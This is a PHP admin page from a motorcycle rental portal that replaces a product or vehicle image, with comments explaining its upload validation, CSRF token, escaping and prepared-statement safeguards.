files >> /home/apca/www/admin/changeimage.php
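<?php
/**
 * Admin page: replace one image of a product or vehicle record.
 *
 * Request inputs (all client-controlled, so each is validated or escaped before use):
 *   GET  imgName   - name of the file form field. The last character of the part before
 *                    the first "." selects the image column (Pimage<x> / Vimage<x>).
 *   GET  imageType - "product" selects tblproducts / img/productimages; any other value
 *                    selects tblvehicles / img/vehicleimages.
 *   GET  imgid     - numeric id of the row to update.
 *   POST update    - present when the upload form was submitted.
 *
 * Security-relevant behaviour of this version:
 *   - The column name is interpolated into SQL (identifiers cannot be bound as
 *     parameters), so its client-supplied suffix is restricted to one alphanumeric
 *     character before any query is built.
 *   - The uploaded file is stored under a server-generated name whose extension comes
 *     from the detected image type. The client-supplied file name is never used, so a
 *     script file cannot be written into the web-served img/ tree under its own name.
 *   - The form carries a per-session anti-CSRF token that is checked on POST.
 *   - Every request-derived value is HTML-escaped on output.
 *
 * NOTE(review): independently of this page, the web server should be configured so that
 * nothing under img/ is executed as a script; content sniffing alone does not rule out
 * image files that also carry script text.
 */
session_start();
error_reporting(0);
include('includes/config.php');

// Unauthenticated visitors are sent to the login page; stop here so none of the
// upload or query logic below can run for them.
if (!isset($_SESSION['alogin']) || strlen((string) $_SESSION['alogin']) === 0) {
    header('location:index.php');
    exit;
}

$error = '';
$msg = '';

// Accept only scalar strings: an array-valued parameter would otherwise reach explode()
// and the array index below.
$imgName   = (isset($_GET['imgName']) && is_string($_GET['imgName'])) ? $_GET['imgName'] : '';
$imageType = (isset($_GET['imageType']) && is_string($_GET['imageType'])) ? $_GET['imageType'] : '';
$id        = isset($_GET['imgid']) ? intval($_GET['imgid']) : 0;

$isProduct      = ($imageType === 'product');
$imageDirectory = $isProduct ? 'productimages' : 'vehicleimages';
$tableName      = $isProduct ? 'tblproducts' : 'tblvehicles';
$titleName      = $isProduct ? 'Product ' : 'Vehicle ';

// Column name = fixed prefix + last character of imgName's first dot-separated segment.
$imgTest   = explode('.', $imgName);
$suffix    = (string) substr($imgTest[0], -1);
$fieldName = ($isProduct ? 'Pimage' : 'Vimage') . $suffix;

// The suffix ends up inside SQL text, so allow a single ASCII letter or digit only.
// NOTE(review): if the real column set is known (e.g. a fixed range of digits), tighten
// this to an explicit allow-list of column names.
$fieldIsValid = (preg_match('/\A[A-Za-z0-9]\z/', $suffix) === 1);
if (!$fieldIsValid) {
    $error = 'Invalid image field.';
}

// Escaped copies for every place these request-derived values are written into HTML.
$safeFieldName = htmlspecialchars($fieldName, ENT_QUOTES, 'UTF-8');
$safeImgName   = htmlspecialchars($imgName, ENT_QUOTES, 'UTF-8');

// Per-session anti-CSRF token for this form.
if (empty($_SESSION['changeimage_csrf'])) {
    $_SESSION['changeimage_csrf'] = bin2hex(random_bytes(32));
}

// Handle the image upload.
if (isset($_POST['update'])) {
    $postedToken = (isset($_POST['csrf_token']) && is_string($_POST['csrf_token'])) ? $_POST['csrf_token'] : '';
    $upload      = isset($_FILES[$imgName]) ? $_FILES[$imgName] : null;

    if (!hash_equals($_SESSION['changeimage_csrf'], $postedToken)) {
        $error = 'Invalid request token. Please reload the page and try again.';
    } elseif (!$fieldIsValid) {
        $error = 'Invalid image field.';
    } elseif (
        !is_array($upload)
        || !isset($upload['error'])
        || is_array($upload['error'])
        || $upload['error'] !== UPLOAD_ERR_OK
    ) {
        $error = 'No file was uploaded, or the upload failed.';
    } else {
        // Decide the type from the file content, not from the client-supplied name or
        // MIME type, and map it to a fixed extension.
        $allowedTypes = array(
            IMAGETYPE_JPEG => 'jpg',
            IMAGETYPE_PNG  => 'png',
            IMAGETYPE_GIF  => 'gif',
            IMAGETYPE_WEBP => 'webp',
        );
        $imageInfo = getimagesize($upload['tmp_name']);

        if ($imageInfo === false || !isset($allowedTypes[$imageInfo[2]])) {
            $error = 'Only JPEG, PNG, GIF or WebP images can be uploaded.';
        } else {
            // Server-generated name: avoids attacker-chosen extensions and avoids
            // overwriting an existing file that happens to share the client's name.
            $storedName = bin2hex(random_bytes(16)) . '.' . $allowedTypes[$imageInfo[2]];
            $targetPath = "img/$imageDirectory/" . $storedName;

            if (!move_uploaded_file($upload['tmp_name'], $targetPath)) {
                $error = 'The uploaded file could not be saved.';
            } else {
                // $tableName is one of two literals and $fieldName passed the check above.
                $sql = "update $tableName set $fieldName=:image where id=:id";
                $query = $dbh->prepare($sql);
                $query->bindParam(':image', $storedName, PDO::PARAM_STR);
                $query->bindParam(':id', $id, PDO::PARAM_INT);
                if ($query->execute()) {
                    $msg = "Image updated successfully";
                } else {
                    $error = 'The image record could not be updated.';
                }
            }
        }
    }
}

// Load the currently stored image name(s) for display; skipped when the column name
// did not validate, so no query is ever built from a rejected value.
$results = array();
if ($fieldIsValid) {
    $sql = "SELECT $fieldName from $tableName where $tableName.id=:id";
    $query = $dbh->prepare($sql);
    $query->bindParam(':id', $id, PDO::PARAM_INT);
    $query->execute();
    $results = $query->fetchAll(PDO::FETCH_OBJ);
}
?>
<!doctype html>
<html lang="en" class="no-js">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="theme-color" content="#3e454c">

    <title>Alpenpass Motorcycle Rental Portal | Admin Update <?php echo $safeFieldName; ?></title>

    <!-- Font awesome -->
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <!-- Sandstone Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <!-- Bootstrap Datatables -->
    <link rel="stylesheet" href="css/dataTables.bootstrap.min.css">
    <!-- Bootstrap social button library -->
    <link rel="stylesheet" href="css/bootstrap-social.css">
    <!-- Bootstrap select -->
    <link rel="stylesheet" href="css/bootstrap-select.css">
    <!-- Bootstrap file input -->
    <link rel="stylesheet" href="css/fileinput.min.css">
    <!-- Awesome Bootstrap checkbox -->
    <link rel="stylesheet" href="css/awesome-bootstrap-checkbox.css">
    <!-- Admin Style -->
    <link rel="stylesheet" href="css/style.css">
    <style>
        .errorWrap {
            padding: 10px;
            margin: 0 0 20px 0;
            background: #fff;
            border-left: 4px solid #dd3d36;
            -webkit-box-shadow: 0 1px 1px 0 rgba(0,0,0,.1);
            box-shadow: 0 1px 1px 0 rgba(0,0,0,.1);
        }
        .succWrap{
            padding: 10px;
            margin: 0 0 20px 0;
            background: #fff;
            border-left: 4px solid #5cb85c;
            -webkit-box-shadow: 0 1px 1px 0 rgba(0,0,0,.1);
            box-shadow: 0 1px 1px 0 rgba(0,0,0,.1);
        }
    </style>
</head>

<body>
    <?php include('includes/header.php');?>
    <div class="ts-main-content">
        <?php include('includes/leftbar.php');?>
        <div class="content-wrapper">
            <div class="container-fluid">

                <div class="row">
                    <div class="col-md-12">

                        <h2 class="page-title"><?php echo $titleName . $safeFieldName; ?> </h2>

                        <div class="row">
                            <div class="col-md-10">
                                <div class="panel panel-default">
                                    <div class="panel-heading"><?php echo $titleName . $safeFieldName; ?> Details</div>
                                    <div class="panel-body">
                                        <form method="post" class="form-horizontal" enctype="multipart/form-data">
                                            <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($_SESSION['changeimage_csrf'], ENT_QUOTES, 'UTF-8'); ?>">

                                            <?php if ($error) { ?><div class="errorWrap"><strong>ERROR</strong>:<?php echo htmlentities($error); ?> </div><?php } else if ($msg) { ?><div class="succWrap"><strong>SUCCESS</strong>:<?php echo htmlentities($msg); ?> </div><?php } ?>

                                            <div class="form-group">
                                                <label class="col-sm-4 control-label">Current <?php echo $safeFieldName; ?></label>
                                                <?php foreach ($results as $result) { ?>
                                                <div class="col-sm-8">
                                                    <img src="img/<?php echo $imageDirectory; ?>/<?php echo htmlentities($result->$fieldName);?>" width="300" style="border:solid 1px #000">
                                                </div>
                                                <?php } ?>
                                            </div>

                                            <div class="form-group">
                                                <label class="col-sm-4 control-label">Upload New <?php echo $safeFieldName; ?><span style="color:red">*</span></label>
                                                <div class="col-sm-8">
                                                    <input type="file" name="<?php echo $safeImgName; ?>" accept="image/*" required>
                                                </div>
                                            </div>
                                            <div class="hr-dashed"></div>

                                            <div class="form-group">
                                                <div class="col-sm-8 col-sm-offset-4">
                                                    <button class="btn btn-primary" name="update" type="submit">Update</button><br /><br />
                                                    <?php if ($isProduct) { ?>
                                                    <a href="https://alpenpass.ca/admin/edit-product.php?id=<?php echo $id; ?>" >Return to <?php echo $titleName;?></a><br />
                                                    <a href="manage-products.php">Return to <?php echo $titleName;?> List</a>
                                                    <?php } else { ?>
                                                    <a href="https://alpenpass.ca/admin/edit-vehicle.php?id=<?php echo $id; ?>" >Return to <?php echo $titleName;?></a><br />
                                                    <a href="manage-vehicles.php">Return to <?php echo $titleName;?> List</a>
                                                    <?php } ?>
                                                </div>
                                            </div>

                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>

                    </div>
                </div>

            </div>
        </div>
    </div>

    <!-- Loading Scripts -->
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap-select.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/jquery.dataTables.min.js"></script>
    <script src="js/dataTables.bootstrap.min.js"></script>
    <script src="js/Chart.min.js"></script>
    <script src="js/fileinput.js"></script>
    <script src="js/chartData.js"></script>
    <script src="js/main.js"></script>
</body>
</html>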